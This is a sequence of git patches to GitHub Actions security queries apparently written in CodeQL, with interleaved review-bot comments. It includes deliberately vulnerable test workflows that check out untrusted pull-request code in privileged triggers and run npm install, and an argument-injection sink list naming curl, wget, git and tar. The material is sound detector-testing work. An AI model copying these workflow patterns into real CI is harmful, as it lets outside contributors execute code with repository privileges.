Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index d9e5d6be6707..47a0dfc6bd34 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -6,7 +6,7 @@ jobs: steps: - name: Get PR number id: pr_number - if: ${{ github.event_name == 'issue_comment'}} + if: github.event_name == 'issue_comment' && github.repository_owner == 'foo' run: | PR_URL="${{ github.event.issue.pull_request.url }}" PR_NUMBER=${PR_URL##*/} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml new file mode 100644 index 000000000000..b98d76549986 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml new file mode 100644 index 000000000000..037a0eb79f95 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml 
@@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.pull_request.head.repo.full_name == github.repository + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml new file mode 100644 index 000000000000..bcde60f55cb8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml new file mode 100644 index 000000000000..55aa0b41c6c7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml 
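Review bot: The `if:` expression on the `build` job compares `conclusion` against `"success"` in double quotes, which GitHub Actions expression syntax does not accept (string literals are single-quoted), so this fixture would be rejected by the workflow validator; workflow_run_untrusted_checkout_3.yml carries the same literal. Since both files exist to exercise how the query recognises `workflow_run` protection checks, keeping them valid keeps the test representative of real workflows: `if: github.event.workflow_run.conclusion == 'success' && github.repository_owner == 'foo'`.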
@@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.event.workflow_run.head_repository.full_name == github.repository + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4dc2b53e5910..f20fdc798291 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -262,7 +262,15 @@ edges | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 81a8c63c8822..1d6122b37479 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,3 +18,5 @@ | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From c7fde2a40d87ec164b72990980eaf085e38bf8e5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:35:00 +0200 Subject: [PATCH 553/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00d8e21c05df..d79107e06c6f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.59 +version: 0.1.60 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 94468d4b96c8..aeaae6dbb91d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.59 +version: 0.1.60 groups: [actions, queries] suites: codeql-suites extractor: javascript From 726392c8b7b65f6efadad21c1ef353c7b56d0fea Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Tue, 1 Oct 2024 09:48:16 +0200 Subject: [PATCH 554/707] Suppress `actions/cache-poisoning/code-injection` alerts covered by `actions/code-injection/critical` --- ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql | 3 ++- .../Security/CWE-349/CachePoisoningViaCodeInjection.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 411d0052d4bc..fe49b2dd3b51 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -30,7 +30,8 @@ where check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not job.isPrivileged() and + // which is covered by `actions/code-injection/critical` + not job.isPrivilegedExternallyTriggerable(event) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(event) 
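Review bot: The comment above the changed line still reads "excluding privileged workflows", but the new condition `not job.isPrivilegedExternallyTriggerable(event)` excludes only jobs that are both privileged and externally triggerable through `event`; a privileged job that cannot be triggered from outside now stays in scope for this query, which is presumably intended since `actions/code-injection/critical` would not report it. Rewording the comment to match, `// excluding privileged, externally triggerable workflows since they can be exploited in easier circumstances`, avoids a reader assuming all privileged jobs are filtered. The enclosing `where` clause starts and ends outside the hunk.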
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index d9f659cbcc38..5c5c26edb4e5 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -8,4 +8,3 @@ nodes subpaths #select | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | From ef37e3c59400ff117e577e669a6bb32b5cfd4b7f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 1 Oct 2024 14:22:08 +0200 Subject: [PATCH 555/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d79107e06c6f..af477fb9bf71 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.60 +version: 0.1.61 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index aeaae6dbb91d..7b8b9ef321c2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.60 +version: 0.1.61 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4b74adec4b7165dc9f10c22dfff791055c3bcedf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:31:59 +0200 Subject: [PATCH 556/707] Account for branches filter as a way to prevent workflow_run to trigger on PRs from forks --- ql/lib/codeql/actions/ast/internal/Ast.qll | 11 ++++------- ql/lib/ext/config/argument_injection_sinks.yml | 7 +++++++ 2 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d4716f89e191..f2d3698597f1 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -722,13 +722,10 @@ class EventImpl extends AstNodeImpl, TEventNode { not this.getName() = "workflow_run" or this.getName() = "workflow_run" and - // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch - // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow - // but in that case, the triggering workflow will run in the context of the PR head branch - ( - not exists(this.getAPropertyValue("branches")) or - this.getAPropertyValue("branches").matches("%*%") - ) + // workflow_run cannot be externally triggered if the triggering workflow runs in the context of the default branch + // An attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // in that case, the triggering workflow will run in the context of the PR head branch + not exists(this.getAPropertyValue("branches")) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally this.getName() = "workflow_call" and diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 4588af0bf00f..ab523c59303c 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -3,7 +3,14 @@ extensions: pack: github/actions-all extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ + # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - ["(awk)(.*?)", 2, 3] + - ["(curl)(.*?)", 2, 3] + - ["(find)(.*?)", 2, 3] + - ["(git)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] + - ["(tar)(.*?)", 2, 3] + - ["(wget)(.*?)", 2, 3] + - ["(zip)(.*?)", 2, 3] From 2727bf5e2fdb220f266a0bc90675074c95548d13 Mon Sep 17 00:00:00 2001 
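Review bot: Removing the `matches("%*%")` alternative makes any `branches` filter on `workflow_run` count as a reason the event cannot be externally triggered, including wildcard filters such as `branches: ['**']` (constructed example) that do not restrict the triggering branch at all, so those workflows become false negatives for every query built on this predicate. The previous grouping, `(not exists(this.getAPropertyValue("branches")) or this.getAPropertyValue("branches").matches("%*%"))`, credited a concrete branch list while still distrusting a glob; keeping that case seems safer than dropping it. The enclosing predicate starts and ends outside the hunk, so I cannot see whether `branches-ignore` is treated the same way.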
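Review bot: The new `curl`/`find`/`git`/`tar`/`wget`/`zip` entries copy the `(awk)(.*?)` shape, which requires no separator after the command name, so a command beginning with one of these words — `gitleaks detect ...` or `tarsum ...` (constructed examples) — is captured as `git` or `tar` with the remainder treated as its arguments. If the patterns are consumed as-is by `regexpCapture`, as ArgumentInjectionQuery.qll does, adding a whitespace requirement, `- ["(git)\\s+(.*?)", 2, 3]`, keeps the two capture groups while rejecting those prefixes; the same applies to the existing `awk` and `sed` rows. Beyond the hunk I cannot see whether a wrapper adds a word boundary around these expressions, so treat this as a question if it does.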
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:05 +0200 Subject: [PATCH 557/707] Add improved Bash script parser --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/Helper.qll | 100 +++++++++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ 3 files changed, 104 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 63f2552f5829..a4c50ecf55b6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -293,6 +293,10 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + + string getACommand() { result = super.getACommand() } + + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f9fa108ec3a2..d6e3042ead36 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -54,7 +54,6 @@ predicate isBashParameterExpansion(string expr, string parameter, string operato ) } -// TODO, the followinr test fails bindingset[raw_content] predicate extractVariableAndValue(string raw_content, string key, string value) { exists(string regexp, string content | content = trimQuotes(raw_content) | @@ -246,10 +245,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -string partialFileContentRegexp() { - result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] -} - bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. 
@@ -257,7 +252,7 @@ predicate outputsPartialFileContent(string snippet) { // echo "FOO=$(> $GITHUB_ENV // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH - snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"]) + Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 } string defaultBranchNames() { 
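Review bot: `ls` was part of the removed `partialFileContentRegexp()` but is not in `Bash::partialFileContentCommand()`, so an assignment like `FOO=$(ls artifacts)` (constructed example) is no longer treated as reading attacker-influenced content; filenames inside an untrusted artifact are as attacker-chosen as its bytes, and the commit's diffstat shows no expected-file change, so no test caught the narrowing. Adding `"ls"` to that list in the `Bash` module restores the old coverage. The new `+ " "` check also recognises only a single space after the command name, where the old `\\s+` accepted any whitespace; `Bash::getACommand(snippet).regexpMatch("(<|(" + Bash::partialFileContentCommand() + ")\\s).*")` keeps that tolerance.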
@@ -310,3 +305,96 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + bindingset[script] + string getACommand(string script) { + exists(string stmt_, string stmt, string subline2, string cmd | + stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and + stmt = + [ + // $() command substitution + stmt_ + .regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", ""), + // `...` command substitution + stmt_ + .regexpFind("\\`[^\\`]+\\`", _, _) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", ""), + // original line with no substitutions + stmt_ + .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") + .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") + ] and + // We shoulg replace quoted arguments with a placeholder to avoid splitting them + // eg: ls | grep -E "*.(tar.gz|zip)$" + //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and + ( + stmt.regexpMatch(".*\"([^\"]+)\".*") and + exists(int i | + subline2 = + stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), + stmt.regexpFind("\"([^\"]+)\"", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + stmt.regexpMatch(".*'([^']+)'.*") and + exists(int i | + subline2 = + 
stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), + stmt.regexpFind("'([^']+)'", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + not stmt.regexpMatch(".*'([^']+)'.*") and + not stmt.regexpMatch(".*\"([^\"]+)\".*") and + subline2 = stmt + ) and + cmd = subline2.splitAt(splitSeparators()).trim() and + // when splitting the line with a separator that is not found, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not cmd.indexOf(splitSeparators()) > -1 and + not cmd = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", + "case", "esac", "{", "}" + ] and + result = + cmd.replaceAll("::PIPE::", "|") + .replaceAll("::SEMICOLON::", ";") + .replaceAll("::AND::", "&&") + .replaceAll("::OR::", "||") + ) + } + + bindingset[script] + predicate getAnAssignment(string script, string name, string value) { + exists(string stmt | + stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index f2d3698597f1..5b96781a10b1 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,6 +1319,12 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + string getACommand() { result = Bash::getACommand(this.getScript()) } + + predicate getAnAssignment(string name, string value) { + Bash::getAnAssignment(this.getScript(), name, value) + } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } 
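Review bot: The quoted-argument protection in `getACommand` masks only one quoted span per result: `exists(int i | subline2 = stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), ...))` yields one `subline2` per occurrence `i` with every other quoted span left unmasked, and a statement mixing `'...'` and `"..."` takes only one of the two branches. A line such as `grep "a|b" file | tee "c;d"` (constructed example) therefore still splits inside a quoted span in every candidate, surfacing fragments like `b" file` as commands, which feeds false positives and negatives into the sinks that now consume `getACommand()`. Masking all spans needs a fold over the occurrences (a recursive predicate that applies occurrence `i` to the result for `i-1`) rather than one `replaceAll`; a fence would restate most of the predicate, so I leave it as a description. Heredoc bodies (`<<EOF`) are not skipped either, so their lines also surface as commands. Two comment typos on the new side: `shoulg` → `should`, and `we only one the split parts` → `we only want the split parts`.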
From a5075e52161509c245e0e0390ce4929e189c450f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:42 +0200 Subject: [PATCH 558/707] Change queries to use the new bash parser --- .../security/ArgumentInjectionQuery.qll | 14 ++-- .../security/ArtifactPoisoningQuery.qll | 64 ++++++------------- .../codeql/actions/security/ControlChecks.qll | 11 ++-- .../security/EnvPathInjectionQuery.qll | 7 +- .../actions/security/EnvVarInjectionQuery.qll | 7 +- .../security/OutputClobberingQuery.qll | 11 ++-- .../actions/security/PoisonableSteps.qll | 8 +-- .../security/UntrustedCheckoutQuery.qll | 36 +++++------ 8 files changed, 61 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 37f966668df6..6e1a5c0f2293 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -28,13 +28,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ) or exists( - Run run, string line, string argument, string regexp, int argument_group, int command_group + Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and run.getScriptScalar() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } 
@@ -60,12 +60,12 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { source instanceof RemoteFlowSource or exists( - Run run, string argument, string line, string regexp, int command_group, int argument_group + Run run, string argument, string cmd, string regexp, int command_group, int argument_group | run.getScriptScalar() = source.asExpr() and - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index ebe22140be24..b70155906143 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -155,71 +155,54 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getScript() = script and - script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and - script.splitAt("\n").matches("%github.event.workflow_run.id%") and + this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getACommand().matches("%github.event.workflow_run.id%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - 
normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or + this.getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - DirectArtifactDownloadStep() { // eg: // run: | 
